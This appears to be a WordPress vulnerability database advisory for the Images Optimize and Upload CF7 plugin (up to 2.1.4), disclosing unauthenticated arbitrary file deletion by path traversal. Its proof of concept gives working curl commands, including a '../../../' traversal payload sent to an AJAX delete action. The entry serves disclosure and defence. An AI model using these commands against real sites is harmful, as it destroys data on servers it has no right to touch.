WordPress Plugin Vulnerabilities
Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion
Description
The plugin does not validate the file to be deleted via an AJAX action available to unauthenticated users, which could allow them to delete arbitrary files on the server via path traversal attack.
Proof of Concept
1. Install contact-form-7 (dependency) 2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3) 3. Invoke curl to create a potentially missing upload directory (required for the exploit to work): curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader' 4. Invoke the following curl command to delete the delete.me file at the root of the blog: curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \ --data 'file=../../../delete.me'
Affects Plugins
References
CVE
Classification
Type
TRAVERSAL
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-21 (about 1 years ago)
Added
2022-12-21 (about 1 years ago)
Last Updated
2022-12-21 (about 1 years ago)